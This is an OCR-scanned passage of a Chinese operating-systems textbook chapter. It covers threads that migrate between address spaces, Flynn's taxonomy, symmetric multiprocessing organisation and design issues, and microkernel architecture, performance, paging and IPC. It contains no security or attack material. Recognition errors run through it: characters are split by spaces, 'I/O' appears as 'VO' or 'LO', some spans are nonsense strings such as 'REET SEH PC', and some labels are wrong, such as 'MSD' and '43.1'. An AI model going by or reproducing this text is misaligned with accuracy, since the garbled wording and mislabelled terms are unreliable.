论 过 的 一 样 。 但 是 ,单个 用 户 的 活动 或 应 用 程序 也 可 能 在 多 个 域 中 执行 , 在 这 种 情况 下 ,线程 可 
以 从 一 个 域 移动 到 另 一 个 域 。 
在 多 个 域 中 使 用 一 个 线程 最 初 是 为 了 给 程序 员 提 供 结构 化 的 工具 ， 例 如 ， 考 虑 一 个 使 用 IO 
子 程序 的 程序 。 在 允许 用 户 派生 进程 的 多 道 程序 设计 环境 中 , 主 程序 可 能 产生 一 个 新 进程 去 处 理 
LO， 然后 继续 执行 。 但 是 ， 如 果 主 程序 后 面 的 步 又 依赖 于 VO 操作 的 结果 ， 则 主 程序 必须 等 待 
其 他 IO 程序 结束 。 实 现 这 个 应 用 有 以 下 几 种 方法 : 
1) 整个 程序 可 以 作为 一 个 进程 来 实现 。 这 是 一 个 合理 而 直观 的 解决 方案 ,但 存储 管理 有 一 
些 缺 陷 。 为 了 有 效 地 执行 ， 整 个 进程 可 能 需要 相当 大 的 内 存 空间 ， 而 IO 子 程序 需要 一 
个 相对 比较 小 的 地 址 空间 ， 以 缓冲 WO 并 处 理 相对 少量 的 程序 代码 。 由 于 IO 程序 在 大 
程序 的 地 址 空间 中 执行 , 那么 在 IO 操作 期 间 整个 进程 必须 驻 留 在 内 存 中 , 或 者 经 过 LO 
操作 被 交换 出 去 。 如 果 把 主 程序 和 VO 子 程序 作为 在 同一 个 地 址 空间 中 的 两 个 线程 来 实 
现 ， 则 这 种 存储 管理 的 影响 仍然 存在 。 
2) 主 程序 和 VO 子 程序 可 以 作为 两 个 独立 的 进程 实现 。 这 会 带 来 创建 辅助 程序 的 开销 。 如 
F LO 活动 频繁 ， 那么 我 们 要 么 必须 保持 每 个 辅助 进程 处 于 活跃 状态 ， 这 会 消耗 管理 资 
源 ， 要 么 必须 频繁 地 创建 和 销毁 这 个 子 程序 ， 这 种 方法 效率 很 低 。 
3) 把 主 程序 和 VO 子 程序 看 做 是 一 个 活动 ， 由 一 个 线程 实现 ， 但 是 为 主 程序 和 IO 子 程序 
分 别 创建 一 个 地 址 空间 ( 域 )。 因 此 , 在 执行 过 程 中 ,这 个 线程 可 以 在 两 个 地 址 空间 之 间 
移动 ， 操 作 系 统 可 以 分 别管 理 这 两 个 地 址 空间 ， 而 且 不 会 带 来 任何 创建 进程 的 开销 。 此 
Sh, VO 子 程序 使 用 的 地 址 空间 可 以 共享 给 其 他 相似 的 IO 程序 。 
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TRIX 开发 者 的 经 验 表 明 ， 第 三 种 方法 有 很 大 的 优点 ， 对 某 些 应 用 程序 来 说 可 能 是 最 有 效 的 
解决 方案 。 


一 对 多 的 关系 

在 分 布 式 操作 系统 (用 于 控制 分 布 式 计 算 机 系统 ) 领域 ， 人 们 对 把 线程 作为 一 个 可 以 在 地 址 
空间 中 移动 的 实体 有 很 大 的 兴趣 S 。 关 于 这 方面 研究 的 一 个 著名 例子 是 Clouds 操作 系统 ， 它 的 
内 核 叫 Ra [ DASG92 ]。 另 一 个 例子 是 Emerald 系统 [| STEE95 ]。 

从 用 户 的 角度 看 ，Clouds 中 的 线程 是 一 个 活动 单位 。 进 程 是 一 个 带 有 相关 的 进程 控制 块 的 
虚 地 址 空间 。 线程 被 创建 的 时 候 , 通过 调用 进程 中 一 个 程序 的 入 口 点 , 开始 在 进程 中 执行 。 线 程 
可 以 从 一 个 地 址 空间 转移 到 另 一 个 地 址 空间 甚至 横 跨 机 器 的 边界 ( 即 从 一 台 计 算 机 移动 到 另 一 台 
计算 机 )。 当 线程 移动 时 ， 它 必须 带 着 自己 的 某 些 信息 ， 如 控制 终端 、 全 局 参数 和 调度 指导 信息 
( 如 优先 级 )。 

Clouds 方法 为 把 用 户 和 程序 员 与 分 布 环境 细 节 隔 离开 提供 了 一 条 有 效 的 途径 。 用 户 的 活动 
可 以 表示 成 线程 , 此 线程 在 计算 机 间 的 移动 由 操作 系统 根据 各 种 与 系统 相关 的 因素 而 控制 , 如 对 
远程 资源 进行 访问 的 需要 、 负 载 平衡 等 。 


4.2 对称 多 处 理 


传统 上 , 计算 机 被 看 做 是 顺序 机 器 , 大 多 数 计算 机 编程 语言 要 求 程 序 员 把 算法 定义 成 指令 序 
列 。 处 理 器 通过 按 顺序 逐条 地 执行 机 器 指令 来 执行 程序 。 每 条 指令 是 以 操作 序列 ( 取 指 、 取 操作 
数 、 执 行 操作 、 存 储 结果 ) 的 方式 执行 的 。 

对 计算 机 的 这 种 看 法 并 不 是 完全 真实 的 。 在 微 操作 级 别 ， 同 一 时 间 会 有 多 个 控制 信号 产生 ; 
长 久 以 来 指令 流水 线 技术 至 少 可 以 把 取 操 作 和 执行 操作 重 倒 起来; 这 些 都 是 并 行 执行 的 例子 。 

随 着 计算 机 技术 的 发 展 和 计算 机 硬件 价格 的 下 降 ， 计算 机 的 设计 者 们 找到 了 越 来 越 多 并 行 
处 理 的 机 会 。 这 些 并 行 处 理 的 方法 通常 用 于 提高 性 能 ， 在 某 些 情况 下 也 可 以 用 于 提高 可 靠 性 。 
EPRE, 我 们 分 析 了 两 种 最 流行 的 通过 复制 处 理 器 提供 并 行 性 的 手段 : 对 称 多 处 理 (SMP ) ME 
群 。 本 节 将 讲述 SMP， 第 16 章 将 分 析 集 群 。 


4.2.1 SMP 体系 结构 


明确 SMP 体系 结构 处 于 整个 并 行 处 理 器 类 别 的 什么 位 置 是 有 用 的 。Flynn [ FLYN72 ] 首先 
提出 的 对 并 行 处 理 器 系统 的 分 类 仍然 是 最 常用 的 分 类 法 ， 他 把 计算 机 系统 分 为 以 下 4 类 : 
@ 单 指令 单数 据 (SISD) 流 : 单 处 理 器 执行 单个 指令 流 ， 对 保存 在 单个 内 存 中 的 数据 进行 
操作 。 
o 单 指令 多 数据 (SIMD) 流 : 一 个 机 器 指令 控制 许多 处 理 部 件 步伐 一 致 地 同时 执行 。 每 个 
处 理 部 件 都 有 一 个 相关 的 数据 内 存 ， 因 此 ， 每 条 指令 由 不 同 的 处 理 器 在 不 同 的 数据 集合 
上 执行 。 向 量 和 阵列 处 理 器 都 属于 这 一 类 。 
o 多 指令 单数 据 (MSD) 流 : 一 系列 数据 被 传送 到 一 组 处 理 器 上 ,每 个 处 理 器 执行 不 同 的 
指令 序列 。 这 个 结构 从 未 实现 过 。 
@ 多 指令 多 数据 (MIMD) 流 : 一 组 处 理 器 同时 在 不 同 的 数据 集 上 执行 不 同 的 指令 序列 。 
在 MIMD 结构 中 ， 处 理 器 是 通用 的 ， 因 为 它们 必须 能 够 处 理 执行 相应 的 数据 转换 所 需 的 所 
有 指令 。MIMD 可 以 根据 处 理 器 的 通信 方式 进一步 地 细 化 ， 如 图 4.8 所 示 。 如 果 每 个 处 理 器 都 有 


O ”进程 或 线程 在 地 址 空间 之 间 的 移动 或 者 在 不 同 机 器 上 的 线程 迁移 ， 近 年 来 已 成 为 一 个 热点 。 我 们 将 在 第 16 章 
中 探讨 这 个 主题 。 
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一 个 专用 内 存 , 那么 每 个 处 理 部 件 都 可 以 被 看 做 一 个 独立 的 计算 机 。 计算机 间 的 通信 或 者 借助 于 
固定 的 路 径 ， 或 者 借助 于 某 些 网 络 设施 ， 这 类 系统 称 做 集群 (cluster ), 或 者 多 计算 机 系统 。 如 
果 处 理 器 共享 一 个 公用 内 存 , 每 个 处 理 器 都 访问 保存 在 共享 内 存 中 的 程序 和 数据 , 处理 器 之 间 通 
过 该 内 存 互相 通信 ， 则 这 类 系统 称 为 共享 内 存 多 处 理 器 系统 。 


SIMD《【《 单 指令 MIMD ( 多 指令 
多 数据 流 ) 多 数据 流 ) 


> No 


CRES ) (REA ) 


对 称 多 处 理 ( SMP ) 
图 4.8 并行 处 理 器 体系 结构 


共享 内 存 多 处 理 器 系统 的 一 个 常用 的 分 类 是 基于 如 何 把 进程 分 配给 处 理 器 。 最 基本 的 两 种 方 
法 是 主 /从 和 对 称 。 在 主 / 从 结构 中 ,操作 系统 内 核 总 是 在 某 个 特定 的 处 理 器 上 运行 ,其 他 处 理 器 只 
用 于 执行 用 户 程序 ， 还 可 能 执行 一 些 操作 系统 实用 程序 。 主 处 理 器 负责 调度 进程 或 线程 。 当 一 个 
进程 /线程 是 活路 时， 如果 从 处 理 器 需要 服务 〈 如 一 次 IO 调用 )， 它 必须 给 主 处 理 器 发 送 请 求 ， 并 
等 待 服务 的 执行 。 这 种 方法 是 非常 简单 的 ， 只 需要 对 单 处 理 器 多 道 程 序 操作 系统 做 少许 改进 。 一 
个 处 理 器 控制 了 所 有 的 内 存 和 IO 资源 ， 因 而 可 以 简化 冲突 解决 方案 。 该 方法 的 缺点 如 下 : 

o 主 处 理 器 的 失效 将 导致 整个 系统 失效 。 

@ 由 于 主 处 理 器 必须 单独 完成 所 有 的 调度 和 进程 管理 ， 它 可 能 成 为 性 能 瓶颈 。 

在 对 称 多 处 理 系统 中 , 内 核 可 以 在 任何 处 理 器 上 执行 , 并 且 通 常 是 每 个 处 理 器 从 可 用 的 进程 
或 线程 池 中 进行 自己 的 调度 工作 。 内 核 可 以 由 多 进程 或 多 线程 构成 ， 允 许 部 分 内 核 并 行 执行 。 
SMP 方法 增加 了 操作 系统 的 复杂 性 ， 它 必须 确保 两 个 处 理 器 不 会 选择 同一 个 进程 ， 并 且 确 保 进 
程 不 会 由 于 某 种 原因 从 队列 中 丢失 ， 因 此 必须 采用 相关 技术 以 决定 和 同步 对 资源 的 占用 声明 。 

SMP 和 集群 的 设计 都 很 复杂 ， 涉 及 与 物理 组 织 、 互 连结 构 、 处 理 器 间 通 信 、 操 作 系 统 设计 
和 应 用 软件 技术 相关 的 很 多 问题 。 本 章 以 及 后 面 关 于 集群 的 讨论 ( 和 参见 第 16 章 ) 主要 关注 的 是 
操作 系统 设计 问题 ， 当 然 也 会 简要 提 及 物理 组 织 。 


4.2.2 SMP 系统 的 组 织 结构 


图 4.9 说 明了 SMP 的 一 般 组 织 结 构 。 SMP 中 有 多 个 处 理 器 , 每 个 都 含有 它 自己 的 控制 单元 、 
算术 逻辑 单元 和 寄存 器 ; 每 个 处 理 器 都 可 以 通过 某 种 形式 的 互 连 机 制 访问 一 个 共享 内 存 和 VO 
设备 ; 共享 总 线 就 是 一 个 通用 方法 。 处 理 器 可 以 通过 内 存 ( 留 在 共享 地 址 空间 中 的 消息 和 状态 
信息 ) 互相 通信 ， 还 可 以 直接 交换 信号 。 内 存 通常 被 组 织 成 允许 同时 有 多 个 对 内 存 不 同 独立 部 
分 的 访问 。 

在 现代 计算 机 中 , 处 理 器 通常 至 少 有 专用 的 一 级 高 速 缓存 。 高 速 缓存 的 使 用 带 来 了 新 的 设计 
问题 。 由 于 每 个 本 地 高 速 缓存 包含 一 部 分 内 存 的 映像 ， 如 果 修 改 了 高 速 缓存 中 的 一 个 字 , 可 以 想 
象 得 到 , 这 使 得 在 其 他 高 速 缓存 中 这 个 字 都 变 成 无 效 的 。 为 避免 这 一 点 ， 当 发 生 更 新 时 ， 别 的 处 
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理 器 必须 被 告知 发 生 了 更 新 。 这 个 问题 称 做 高 速 缓存 的 一 致 性 问题 , 通常 用 硬件 解决 而 不 是 由 操 













作 系 统 解决 。 
VO 子 系统 
图 4.9 ”对称 多 处 理 器 组 织 结构 
4.2.3 多 处 理 器 操作 系统 的 设计 思考 


SMP 操作 系统 管理 处 理 器 和 其 他 计算 机 资源 ， 使 得 用 户 可 以 把 整个 系统 看 做 是 与 多 道 程序 


单 处 理 器 系统 相同 的 形式 。 用 户 可 构造 使 用 多 进程 或 多 线程 的 应 用 程序 , 而 无 需 考虑 用 到 一 个 处 
理 器 还 是 多 个 处 理 器 。 因 此 ， 多 处 理 器 操作 系统 必须 提供 多 道 程序 系统 的 全 部 功能 ， 再 加 上 适 
应 多 个 处 理 器 的 附加 功能 。 关 键 的 设计 问题 如 下 : 


同时 的 并 发 进程 或 线程 : 为 允许 多 个 处 理 器 同时 执行 相同 的 内 核 代 码 ， 内 核 例 程 必须 是 
可 重信 的 (reentrant )。 多 个 处 理 器 执行 内 核 的 相同 或 不 同 部 分 时 ， 必 须 对 内 核 表 和 管理 
结构 进行 合适 的 管理 ， 以 避免 死 锁 或 非法 操作 。 

调度 : 调度 可 以 由 任何 处 理 器 执行 ， 因 此 必须 避免 冲突 。 如 果 使 用 了 内 核 级 岁 线程 ， 则 
可 能 出 现在 多 个 处 理 器 上 同时 从 同一 个 进程 中 调度 多 个 线程 的 机 会 。 多 处 理 器 调度 将 在 
第 10 章 讲述 。 

同步 : 因为 多 个 活动 进程 都 可 能 访问 共享 地 址 空间 或 共享 VO RM, ARE RRA 
效 的 同步 。 同 步 是 保证 互 斥 和 事件 排序 的 机 制 ， 锁 ( lock ) 是 多 处 理 器 操作 系统 中 一 个 
通用 的 同步 机 制 ， 详 见 第 5 章 。 

存储 管理 : 多 处 理 器 上 的 存储 管理 必须 处 理 在 单 处 理 器 机 器 上 发 现 的 所 有 问题 ， 详 细 内 
容 见 第 三 部 分 。 此 外 ， 为 达到 最 佳 性 能 ， 操 作 系统 需要 尽 可 能 地 利用 硬件 并 行 性 ， 如 多 
端口 内 存 ; 还 必须 协调 不 同 处 理 句 上 的 分 页 机 制 ， 以 保证 当 多 个 处 理 器 共享 页 或 段 时 页 
面 的 一 致 性 ， 以 及 决定 页 面 置换 的 策略 。 te 

可 靠 性 和 容错 ; 当 处 理 器 失效 时 ， 操 作 系统 应 该 提供 适当 的 功能 降低 。 调 度 程序 和 操作 
系统 的 其 他 部 分 必须 知道 处 理 器 的 失效 情况 ， 并 且 据 此 重新 组 织 管理 表 。 


由 于 多 处 理 器 操作 系统 设计 问题 的 解决 方案 通常 是 在 解决 多 道 程序 单 处 理 器 的 设计 问题 的 
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关于 基于 硬件 的 高 速 缓存 的 一 致 性 问题 的 解决 方案 的 描述 ， 请 参阅 [STALO6a]。 
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解决 方案 扩展 而 来 的 , 因而 我 们 并 不 单独 研究 多 处 理 器 系统 , 具体 的 多 处 理 器 问题 将 在 本 书 的 相 
KD PR. 
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微 内 核 是 一 个 小 型 的 操作 系统 核心 ， 它 为 模块 化 扩展 提供 基础 。 但 是 这 个 术语 有 些 含糊 ， 关 
于 微 内 核 的 许多 问题 , 不 同 的 操作 系统 设计 小 组 有 不 同 的 回答 。 这 些 问 题 包括 ,内核 必须 有 多 小 
才能 称 做 微 内 核 ; 从 硬件 抽象 出 设备 驱动 程序 的 功能 时 , 怎样 设计 才能 获得 最 佳 性 能 ; 是 在 内 核 
空间 还 是 在 用 户 空间 运行 一 个 非 内 核 的 操作 ; 是 保留 现 有 的 子 系统 代码 ( 如 一 个 UNIX 版 本 ) 还 
是 从 头 开始 等 。 

微 内 核 方法 通过 在 Mach 操作 系统 中 的 使 用 而 得 到 推广 ， 该 操作 系统 就 是 现在 的 Macintosh 
Mac OSX 的 核心 。 理 论 上 ， 该 方法 提供 了 高 度 的 灵活 性 和 模块 性 。 当 今 还 有 许多 别 的 产品 声称 
采用 微 内 核实 现 。 在 不 远 的 将 来 , 这 种 通用 的 设计 方法 将 用 于 大 多 数 的 个 人 计算 机 、 工 作 站 和 服 
务 器 的 操作 系统 。 


43.1 微 内 核 体系 结构 


20 世纪 50 年 代 中 期 到 后 期 开发 的 早期 操作 系统 很 少 考虑 结构 问题 , 没有 人 具有 构造 大 型 软 
件 系统 的 经 验 , 并 且 对 由 于 互相 依赖 和 交互 产生 的 问题 估计 过 低 。 在 这 些 单 体 结构 的 操作 系统 中 ， 
任何 过 程 实际 上 都 可 以 调用 任何 别 的 过 程 。 当 操作 系统 规模 变 得 很 大 时 , 这 种 缺乏 结构 的 方法 就 
无 法 支撑 了 。 例如， 第 一 版 0S/360 包含 超过 100 万 行 的 代码 。 后 来 开发 的 Multic, 增长 到 2000 
万 行 代 码 [DENN84]。 正 如 2.3 节 所 讲述 的 ,需要 模块 化 程序 设计 技术 来 解决 软件 开发 规模 的 问 
题 。 特 别 地 ， 出 现 了 分 层 的 操作 系统 9 ， 如 图 4.10a 所 示 ， 所 有 功能 按 层次 组 织 ， 只 在 相 邻 层 之 
间 发 生 交互 。 在 分 层 方 法 中 ， 大 多 数 层 或 所 有 层 都 在 内 核 态 下 执行 。 

分 层 方法 中 也 存在 问题 。 每 层 都 处 理 相当 多 的 功能 , 一 层 中 的 大 的 变化 可 能 会 对 相 邻 层 (上 
一 层 或 下 一 层 ) 中 的 代码 产生 巨大 的 影响 , 这 些 影响 跟踪 起 来 有 很 多 困难 。 其 结果 是 ,在 基本 操 
作 系 统 上 很 难 通过 增加 或 减少 一 些 功 能 实现 一 个 专用 版 本 ， 而 且 由 于 在 相 邻 层 之 间 有 很 多 交互 ， 
因而 很 难保 证 安全 性 。 

微 内 核 的 基本 原理 是 , 只 有 最 基本 的 操作 系统 功能 才能 放 在 内 核 中 。 非 基 本 的 服务 和 应 用 程 
序 在 微 内 核 之 上 构造 ,并 在 用 户 态 下 执行 。 尽 管 什么 应 该 在 徽 内 核 中 、 什 么 应 该 在 微 内 核 外 ,不 
同 的 设计 有 不 同 的 分 界线 ,但 是 共同 的 特点 是 许多 传统 上 属于 操作 系统 一 部 分 的 功能 现在 都 是 外 
部 子 系统 ,包括 设备 驱动 程序 、 文 件 系 统 、 虚 存 管理 程序 、 窗 口 系统 和 安全 服务 。 它 们 可 以 与 内 
核 交 互 ， 也 可 以 互相 交互 。 

微 内 核 结 构 用 一 个 水 平分 层 的 结构 代替 了 传统 的 纵向 分 层 的 结构 ( 如 图 4.10b fra), ER 
内 核 外 部 的 操作 系统 部 件 被 当做 服务 器 进程 实现 ,它们 可 以 借助 于 通过 微 内 核 传递 消息 来 实现 相 
互 之 间 的 交互 。 因 此 , 微 内 核 起 着 以 下 信息 交换 的 作用 : 验证 信息 、 在 部 件 间 传递 信息 并 授权 访 
问 硬件 。 微 内 核 还 执行 保护 功能 : 除非 允许 交换 ， 否 则 它 阻 止 信息 传递 。 

例如 ， 如 果 应 用 程序 想 打 开 一 个 文件 , 则 它 给 文件 系统 服务 进程 发 消息 ; 如 果 想 创建 一 个 进 
ERRE, 则 它 给 进程 服务 发 消息 。 每 个 服务 可 以 给 其 他 服务 发 消息 , 并 且 可 以 调用 微 内 核 中 的 
基本 函数 。 这 就 是 单个 计算 机 中 的 客户 /服务 器 结构 。 


O 像 往常 一 样 ， 这 个 领域 的 术语 与 文献 里 的 并 不 一 致 。 单 体 结构 的 操作 系统 这 一 术语 经 常 被 用 来 指 代 之 前 被 我 
称 为 单 体 结构 和 分 层 的 这 两 类 操作 系统 。 
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4.3.2” 微 内 核 组 织 结构 的 优点 


在 很 多 文献 中 (如 [FINK04 ]、[ LIED96a ] 和 [ WAYN94a ]) 都 总 结 了 使 用 微 内 核 的 优点 ， 
包括 : 一 致 接口 、 可 扩展 性 、 灵 活性 、 可 移植 性 、 可 靠 性 、 分 布 式 系统 支持 、 对 面向 对 象 操作 系 
统 ( Object-Oriented Operating System, OOOS) 的 支持 。 

微 内 核 设计 为 进程 发 出 的 请 求 提供 一 致 接口 。 进 程 不 需要 区 分 是 内 核 级 服务 还 是 用 户 级 服 
务 ， 因 为 所 有 服务 都 是 通过 消息 传递 提供 的 。 

当 新 的 硬件 设备 和 新 的 软件 技术 开发 出 来 后 ,任何 操作 系统 都 将 不 可 避免 地 需要 增加 当前 设 
计 中 没有 的 功能 。 微 内 核 结构 促进 了 可 扩展 性 , 允许 增加 新 的 服务 以 及 在 同一 个 功能 区 域 中 提供 
多 个 服务 。 例 如 ， 可 以 为 磁盘 提供 多 个 文件 组 织 ， 每 个 组 织 可 以 作为 一 个 用 户 级 进程 实现 ， 而 不 
是 在 内 核 中 使 用 多 个 文件 服务 。 因 此 , 用户 可 以 从 各 种 服务 中 选择 最 适应 用 户 需 求 的 一 种 。 使 用 
微 内 核 结 构 ， 当 增加 一 个 新 功能 时 ,只 需要 修改 或 添补 选中 的 服务 。 新 服务 程序 或 修改 过 的 服务 
程序 的 影响 被 限制 在 系统 的 一 个 子 集中 。 而 且 修 改 不 会 导致 需要 构造 一 个 新 内 核 。 

与 微 内 核 结 构 的 可 扩展 性 相关 的 是 它 的 灵活 性 。 不 仅 可 以 在 操作 系统 中 增加 新 功能 , 还 可 以 
删 减 现 有 的 功能 ,以 产生 一 个 更 小 、 更 有 效 的 实现 。 基 于 微 内 核 的 操作 系统 并 不 一 定 是 一 个 小 系 
统 。 实 际 上 ,该 结构 便于 增加 各 种 各 样 的 功能 , 但 并 不 是 每 一 个 人 都 需要 , 例如， 高 级 别 的 安全 
性 或 做 分 布 式 计算 的 能 力 。 如 果实 际 功 能 (根据 内 存 要 求 ) ETAR, 则 这 个 基础 产品 将 对 各 种 
用 户 都 具有 吸引 力 。 

Intel 对 计算 机 平台 市 场 的 垄断 不 可 能 无 限 延 续 ， 因 此 ， 可 移植 性 成 为 操作 系统 的 一 个 热点 。 
在 微 内 核 结 构 中 , 所 有 或 者 至 少 大 部 分 处 理 器 专用 代码 都 在 微 内 核 中 。 因 此 ， 当 把 系统 移植 到 一 
个 处 理 器 上 时 只 需要 很 少 的 变化 ， 而 且 易 于 进行 逻辑 上 的 归 类 。 

软件 产品 的 规模 越 大 ， 就 越 难保 证 其 可 靠 性 。 尽 管 模块 化 设计 有 助 于 增强 可 靠 性 ,但 微 内 核 
结构 可 以 获得 更 大 的 增益 。 小 的 微 内 核 可 以 被 严格 地 测试 ， 它 使 用 少量 的 应 用 程序 编程 接口 
(API)， 这 就 为 内 核 外 部 的 操作 系统 服务 产生 高 质量 的 代码 提供 了 机 会 。 系 统 程序 员 只 掌握 有 限 
数量 的 API 和 有 限 数量 的 交互 方式 ， 因 此 不 易 影 响 到 其 他 系统 部 件 。 

微 内 核 有 助 于 提供 分 布 式 系统 支持 , 包括 分 布 式 操作 系统 控制 的 集群 。 当 客户 端 往 一 个 服务 
器 进程 发 送 消息 时 ， 该 消息 必须 包含 所 请 求 服务 的 标识 符 。 如 果 分 布 式 系统 ( 如 集群 ) 被 配置 为 
所 有 的 进程 和 服务 都 具有 唯一 的 标识 符 ， 那 么 实际 上 在 微 内 核 级 别 上 可 以 看 做 只 有 一 个 单独 的 
系统 映像 。 进 程 可 以 在 不 知道 目标 服务 驻 留 在 哪个 机 器 上 的 情况 下 发 送信 息 。 在 第 六 部 分 讲述 
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分 布 式 系统 时 将 继续 讨论 这 个 问题 。 

微 内 核 结构 也 适用 于 面向 对 象 操作 系统 环境 。 在 微 内 核 设计 和 操作 系统 模块 化 扩展 的 开发 中 
都 可 以 借助 面向 对 象 方法 的 原理 , 因此 , 许多 微 内 核 设 计 都 朝 着 面向 对 象 的 方向 发 展 [ WAYN94b ]。 
结合 了 微 内 核 结 构 和 OOOS 原理 的 一 种 很 有 前 途 的 方法 是 使 用 构件 [ MESS96 ]。 构 件 是 具有 明 
确定 义 的 接口 的 对 象 , 可 以 以 搭 积木 的 方式 通过 互 连 构造 软件 , 构件 中 的 所 有 交互 都 使 用 构件 接 
口 。 其 他 系统 (如 Windows) 并 不 是 完全 采用 面向 对 象 方法 ,但 也 把 面向 对 象 原理 融 人 微 内 核 的 
设计 中 。 

4.3.3 微 内 核 性 能 


经 常 提 到 , 微 内 核 的 一 个 潜在 缺点 是 性 能 问题 。 通 过 微 内 核 构造 和 发 送信 息 、 接 受 应 答 并 解 
码 所 花费 的 时 间 比 进行 一 次 系统 调用 的 时 间 要 多 。 但 是 ， 由 于 别 的 因素 的 作用 ,很 难 概括 出 是 否 
有 性 能 损失 以 及 损失 了 多 少 。 

这 在 很 大 程度 上 取决 于 微 内 核 的 大 小 和 功能 。 [LIBD96a ] 总 结 了 很 多 关于 所 谓 第 一 一 代 微 内 
校 的 性 能 损失 的 研究 。 不 论 对 微 内 核 如 何 优化 , 这 些 损失 总 是 存在 的 。 解决 这 个 问题 的 一 种 方法 
是 , 把 一 些 关键 的 服务 程序 和 了 驱动 程序 重新 放 回 操作 系统 , 这 将 增 大 微 内 核 。 主 要 的 例子 有 Mach 
和 Chorus。 有 选择 地 增加 微 内 核 的 功能 可 以 减少 用 户 -内 核 态 切换 的 次 数 以 及 地 址 空间 进程 切换 
的 次 数 。 但 是 ， 它 是 以 徽 内 核 的 设计 强度 (最 小 的 接口 、 灵 活性 等 ) 为 代价 减少 性 能 损失 的 。 

另 一 种 方法 使 得 微 内 核 不 会 变 大 而 会 变 小 。[ LIED96b ] 表明 ， 适 过 正确 的 设计 ， 一 个 非常 
小 的 微 内 核 可 以 消除 性 能 损失 并 提高 灵活 性 和 可 靠 性 。 为 给 出 大 小 的 概念 , 一 个 典型 的 第 一 代 微 
内 核 含 有 300KB 的 代码 和 140 个 系统 调用 接口 ,一 个 小 的 第 二 代 微 内 核 L4[ HART97, LIED95 ] 
仅 包含 12KB 代码 和 7 个 系统 调用 。 这 些 系 统 的 经 验 表明 它们 比 诸如 UNIX 之 类 的 分 层 操作 系统 
执行 得 更 好 。 

4.3.4 微 内 核 设 计 


由 于 不 同 的 微 内 核 具有 不 同 的 功能 和 大 小 ， 因 而 关于 微 内 核 应 该 提供 什么 功能 以 及 实现 什 
么 结构 并 没有 严格 的 规定 。 本 节 将 给 出 微 内 核 功能 和 服务 的 最 小 集合 ， 从 而 给 该 者 提供 设计 向 
内 核 的 一 些 感性 认识 。 

微 内 核 必须 包括 直接 依赖 于 硬件 的 功能 ， 以 及 那些 支持 服务 程序 和 应 用 程序 在 用 户 态 下 运行 
的 功能 。 这 些 功能 通常 可 分 为 以 下 几 类 : 低级 存储 管理 、 进 程 间 通信 (IPC) 以 及 VO 和 中 断 管理 。 


低级 存储 管理 

微 内 核 必须 控制 硬件 概念 上 的 地 址 空间 ., 使 得 操作 系统 可 以 在 进程 级 实现 保护 。 微 内 核 只 要 
负责 把 每 个 虚拟 页 映射 到 一 个 物理 页 框 , 而 存储 管理 的 大 部 分 功能 , 包括 保护 一 个 进程 的 地 址 空 
间 免 于 另 一 个 进程 的 干涉 , 页 面 置换 算法 以 及 其 他 分 页 逻辑 都 可 以 在 内 核 外 实 更。 例如, 微 内 核 
外 面 的 虚拟 存储 模块 确定 何 时 把 某 一 页 调 人 内 存 以 及 
把 已 经 在 内 存 中 的 哪 一 页 换 出 。 微 内 核 把 这 些 页 面 引 
用 映射 到 内 存 中 的 一 个 物理 地 址 。 

可 以 在 内 核 外 面 执行 页 面 调度 和 虚 存 管理 的 概念 
是 由 Mach 的 外 部 页 面 调度 程序 [YOUN87 ] 引出 的 ， 
.图 4.11 显示 了 一 个 外 部 页 面 调 度 程序 的 操作 。 当 应 用 程 
序 中 的 一 个 线程 引用 了 不 在 内 存 中 的 一 页 时 , 会 发 生 缺 
页 中 断 并 陷入 到 内 核 。 内 核 给 页 面 调度 程序 所 在 进程 发 
送 一 条 消息 ， 表 明 引 用 的 是 哪个 页 。 页 面 调度 程序 决定 装载 该 页 面 并 为 此 分 配 一 个 页 框 。 页 面 消 
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度 程序 和 内 核 必须 发 生 交互 ， 以 把 页 面 调度 程序 的 逻辑 操作 映射 到 物理 内 存 。 一 且 该 页 可 用 ,页 
面 调度 程序 就 给 应 用 程序 发 一 条 恢复 执行 的 消息 。 
这 个 技术 使 得 非 内 核 进程 可 以 把 文件 和 数据 库 喘 射 到 用 户 地 址 空间 而 不 需要 调用 内 核 。 应 用 
程序 专用 的 存储 共享 策略 可 以 在 内 核 外 实现 。 
[ LIED95 ] 提出 了 用 于 支持 内 核 外 部 的 页 面 调度 和 虚 存 管理 的 三 个 微 内 核 操 作 : 
o 授权 : 一 个 地 址 空间 (进程 ) 的 所 有 者 可 以 授权 另 一 个 进程 使 用 它 的 某 些 页 。 内 核 把 这 
些 页 从 授予 者 的 地 址 空间 移出 ， 并 把 它们 分 配给 指定 的 进程 。 
@ 映射 : 一 个 进程 可 以 把 它 的 任何 页 映射 到 另 一 个 进程 的 地 址 空间 ， 使 得 两 个 进程 都 可 以 
访问 这 些 页 。 这 就 在 两 个 进程 间 创建 了 共享 内 存 ， 内 核 把 这 些 页 分 配给 最 初 的 所 有 者 ， 
但 提供 一 个 映射 以 允许 其 他 进程 的 访问 。 
e 刷新 : 进程 可 以 回收 授权 给 别 的 进程 或 映射 到 另外 的 进程 的 任何 页 。 
开始 时 ， 内 核 把 所 有 可 用 的 物理 内 存 作 为 资源 分 配给 一 个 基本 系统 进程 。 创 建 一 个 新 进程 后 ， 
最 初 的 地 址 空间 中 的 页 面 可 以 授权 或 映射 给 新 进程 。 这 种 方案 可 以 同时 支持 多 个 虚拟 内 存 管理 方案 。 
进程 问 通信 
微 内 核 操作 系统 中 进程 之 间或 线程 之 间 进 行 通信 的 基本 形式 是 消息 -消息 由 消息 头 和 消息 体 
组 成 ,消息 头 描述 了 发 送 消息 和 接收 消息 的 进程 ; 消息 体 中 含有 数据 ,或 者 是 指向 一 个 数据 块 的 
指针 ,或 者 是 关于 进程 的 某 些 控制 信息 。 在 典型 情况 下 , 我 们 可 以 认为 进程 间 通 信 基 于 与 进程 相 
关联 的 端口 。 端 口 实际 上 是 发 往 某 个 特定 进程 的 消息 队列 。 与 端口 相关 联 的 是 一 组 功能 , 用 于 表 
明 哪 些 进 程 可 以 与 这 个 进程 进行 通信 。 端口 的 标识 和 功能 由 内 核 维护 , 通过 给 内 核发 送 一 条 指明 
新 端口 功能 的 消息 ， 进 程 可 以 允许 对 自身 授权 新 的 访问 。 
值得 注意 的 是 ， 地 址 空间 不 重 琶 的 独立 进程 之 间 的 消息 传递 涉及 从 内 存 到 内 存 的 复制 。 这 样 ， 
由 于 受 内 存 速度 的 限制 ,复制 的 速度 就 会 远 远 低 于 处 理 器 的 速度 。 因 此 ， 当 前 对 操作 系统 的 研究 热 
REET SEH PC 和 诸如 页 面 重新 映射 (一 个 页 面 被 多 个 进程 共享 ) 之 类 的 共享 内 存 方 案 。 
